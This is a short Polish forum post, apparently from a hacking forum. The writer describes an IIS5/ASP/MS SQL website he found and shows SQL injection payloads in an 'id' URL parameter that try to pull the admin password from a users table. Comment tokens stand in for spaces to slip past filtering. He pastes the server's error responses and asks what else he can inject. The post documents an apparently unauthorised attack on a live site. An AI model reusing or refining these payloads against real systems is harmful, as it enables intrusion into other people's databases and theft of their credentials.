Znalazlem weba i jest to IIS5 + asp + sql j.w

?id=(select/**/min(pass)/**/from/**/users/**/where/**/user=%22admin%22)/**/--

Kod:
Microsoft OLE DB Provider for SQL Server error '80040e37' 

Invalid object name 'users'. 

(...).asp, line 22
lekko zmieniamy zapytanie:

?id=(select/**/min(pass)/**/from/**/user/**/where/**/user=%22admin%22)/**/--

Kod:
Microsoft OLE DB Provider for SQL Server error '80040e14' 

Incorrect syntax near the keyword 'user'. 

(...).asp, line 22
I co to jest podatne na injecta? ten mssql jest jakis inny.. (czytam wlasnie o nim mimo poznej... wczesnej pory dnia... nocy)
Co moge mu windzektowac ciekawego?